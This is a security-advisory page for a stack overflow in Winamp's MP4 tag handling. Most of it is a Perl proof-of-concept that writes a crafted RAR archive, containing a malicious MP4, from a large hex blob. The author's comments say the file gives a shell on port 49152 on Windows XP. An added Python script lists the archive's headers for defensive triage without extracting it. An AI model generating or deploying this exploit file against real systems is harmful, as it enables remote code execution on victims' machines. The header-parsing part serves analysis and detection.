Nullsoft Winamp MP4 tags Stack Overflow

2007.12.17
Credit: SYS 49152
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
#
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE.
# Instead this one is VERY interesting for the exploiters around..
# this is a unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
#
# btw
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated
#this code, 'cause I exploited this one more than a year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)
#
# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00"; # size = 1201 bytes

open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";
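The PoC above only writes a RAR archive to disk; the file it carries is what matters for triage. As an added example that is not part of the advisory or of SYS 49152's code, the following Python script lists what a RAR 2.x/3.x (RAR4-format) archive contains from its block headers alone, without running any decompressor. It embeds the first 80 bytes of the blob above (marker, archive header and file header, with the 1114 bytes of packed data and the end block left out) and a small constructed archive produced by a helper so that the complete-data path is also exercised. The block layout is the one in the public unrar sources; the names `parse_rar_entries`, `build_stored_rar` and `ADVISORY_HEADERS` are chosen here, and header CRCs are not validated.

```python
import struct
from dataclasses import dataclass
from typing import List

# RAR 2.x/3.x block layout: every block begins with
# HEAD_CRC(2) HEAD_TYPE(1) HEAD_FLAGS(2) HEAD_SIZE(2), little-endian.
RAR_MARKER = b"Rar!\x1a\x07\x00"
HEAD_ARCHIVE, HEAD_FILE, HEAD_END = 0x73, 0x74, 0x7B
LHD_LARGE = 0x0100    # 64-bit HIGH_PACK_SIZE / HIGH_UNP_SIZE fields follow the fixed part
LHD_UNICODE = 0x0200  # name is an 8-bit part, a NUL, then an encoded unicode part
LONG_BLOCK = 0x8000   # ADD_SIZE bytes of data follow the block (always set on file headers)

# First 80 bytes of the archive the PoC writes, copied from the blob in the
# advisory: marker, archive header and file header. Packed data and the
# end-of-archive block are deliberately omitted, so this is header-only input.
ADVISORY_HEADERS = bytes.fromhex(
    "52617221 1a0700"                                   # "Rar!" marker block
    "cf90 73 0000 0d00 000000000000"                    # archive header, type 0x73, 13 bytes
    "bf95 74 2080 3c00"                                 # file header prefix, type 0x74, 60 bytes
    "5a040000 70090000 02 0b7cfb08 b3b02436 1d 33 1c00 20000000"
    "5359535f34393135325f4d50345f666f725f77696e616d702e6d7034"  # "SYS_49152_MP4_for_winamp.mp4"
)


@dataclass
class RarEntry:
    name: str
    packed_size: int
    unpacked_size: int
    method: int          # 0x30 = stored, 0x31..0x35 = compression levels
    host_os: int         # 2 = Win32
    data_present: bool   # False when the packed bytes run past the end of the buffer


def parse_rar_entries(data: bytes) -> List[RarEntry]:
    """Walk the block chain and return one RarEntry per file header.
    Header CRCs are not checked: this is a listing for triage, not an extractor."""
    if not data.startswith(RAR_MARKER):
        raise ValueError("not a RAR 2.x/3.x archive: marker block missing")
    pos = len(RAR_MARKER)
    entries: List[RarEntry] = []
    while pos + 7 <= len(data):
        _crc, head_type, head_flags, head_size = struct.unpack_from("<HBHH", data, pos)
        if head_size < 7:
            raise ValueError(f"corrupt block at offset {pos}: HEAD_SIZE {head_size} < 7")
        add_size = 0
        if head_type == HEAD_FILE:
            (pack_size, unp_size, host_os, _file_crc, _ftime, _unp_ver,
             method, name_size, _attr) = struct.unpack_from("<IIBIIBBHI", data, pos + 7)
            body = pos + 7 + 25
            if head_flags & LHD_LARGE:
                high_pack, high_unp = struct.unpack_from("<II", data, body)
                pack_size |= high_pack << 32
                unp_size |= high_unp << 32
                body += 8
            raw_name = data[body:body + name_size]
            if head_flags & LHD_UNICODE and b"\x00" in raw_name:
                raw_name = raw_name.split(b"\x00", 1)[0]   # keep only the 8-bit name
            add_size = pack_size
            entries.append(RarEntry(
                name=raw_name.decode("latin-1"),
                packed_size=pack_size,
                unpacked_size=unp_size,
                method=method,
                host_os=host_os,
                data_present=pos + head_size + pack_size <= len(data),
            ))
        elif head_flags & LONG_BLOCK:
            # Other block types with LONG_BLOCK carry ADD_SIZE right after the 7-byte prefix
            add_size = struct.unpack_from("<I", data, pos + 7)[0]
        if head_type == HEAD_END:
            break
        pos += head_size + add_size
    return entries


def build_stored_rar(name: bytes, payload: bytes) -> bytes:
    """Constructed test input: a minimal RAR4 archive with one stored (0x30) entry.
    Header CRCs are left at zero, which this parser ignores but a real unrar would reject."""
    archive_header = struct.pack("<HBHH", 0, HEAD_ARCHIVE, 0, 13) + b"\x00" * 6
    head_size = 7 + 25 + len(name)
    file_header = (struct.pack("<HBHH", 0, HEAD_FILE, LONG_BLOCK, head_size)
                   + struct.pack("<IIBIIBBHI", len(payload), len(payload), 2, 0, 0, 29,
                                 0x30, len(name), 0x20)
                   + name)
    end_block = struct.pack("<HBHH", 0, HEAD_END, 0x4000, 7)
    return RAR_MARKER + archive_header + file_header + payload + end_block


if __name__ == "__main__":
    for label, blob in (("advisory headers", ADVISORY_HEADERS),
                        ("constructed archive", build_stored_rar(b"hello.txt", b"hello"))):
        print(label)
        for e in parse_rar_entries(blob):
            print(f"  {e.name}: packed={e.packed_size} unpacked={e.unpacked_size} "
                  f"method=0x{e.method:02x} os={e.host_os} data_present={e.data_present}")
```

On the advisory's headers the script reports a single entry, SYS_49152_MP4_for_winamp.mp4, 1114 bytes packed and 2416 unpacked, Win32 host, with the data flagged as absent because the buffer stops after the file name. That listing is the kind of record a mail gateway or sandbox can log before any decompressor touches the file. The header fields also account for the "size = 1201 bytes" comment in the PoC: 7 (marker) + 13 (archive header) + 60 (file header) + 1114 (packed data) + 7 (end block) = 1201.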


Copyright 2024, cxsecurity.com